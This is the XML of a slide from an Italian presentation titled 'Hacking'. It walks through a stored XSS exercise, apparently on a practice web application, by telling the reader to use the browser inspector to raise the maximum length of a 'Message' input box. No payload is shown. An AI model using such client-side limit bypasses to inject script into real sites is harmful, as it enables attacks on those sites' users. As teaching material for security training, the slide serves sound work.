            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="771309" w="1754225">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1754225" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754225" y="771309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="771309"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="1754225" cy="799884"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 16" id="16"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="54504" r="0" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 17" id="17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1476431" y="1409727"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 18" id="18"/>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19" id="19"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16029537" y="6967452"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="1354120"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1354120" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="1354120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1354120"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 22" id="22"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="1382695"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>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ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>SLIDE </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>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ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>09</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="456026"/>
            <a:ext cx="1659828"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26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3616990" y="6253620"/>
            <a:ext cx="4250078" cy="1921510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="345439" indent="-172720" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Una volta nel box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;Message:&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>cliccare il tasto destro del muse e cliccare sull’ultima voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t> &lt;&lt;ispeziona&gt;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="345439" indent="-172720" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Selezionare la prima icona a sinistra e cliccare dentro l’area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;Message:&gt;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="345439" indent="-172720" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Modificare i caratteri massimi in figura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3616990" y="5587166"/>
            <a:ext cx="4911590" cy="692150"/>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Modifica lunghezza massima del box Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2464800" y="5685355"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11279280" y="3120793"/>
            <a:ext cx="4250078" cy="540385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Andiamo alla sezione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;XSS stored&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> nella sezione Name e inserire un nome a piacere.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11592171" y="2501153"/>
            <a:ext cx="2788414" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2799"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>XSS STORED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9878149" y="2208901"/>
            <a:ext cx="1401131" cy="1064098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="8728"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6234">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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DAGKE9jt4zY</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>Hacking</dc:title>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>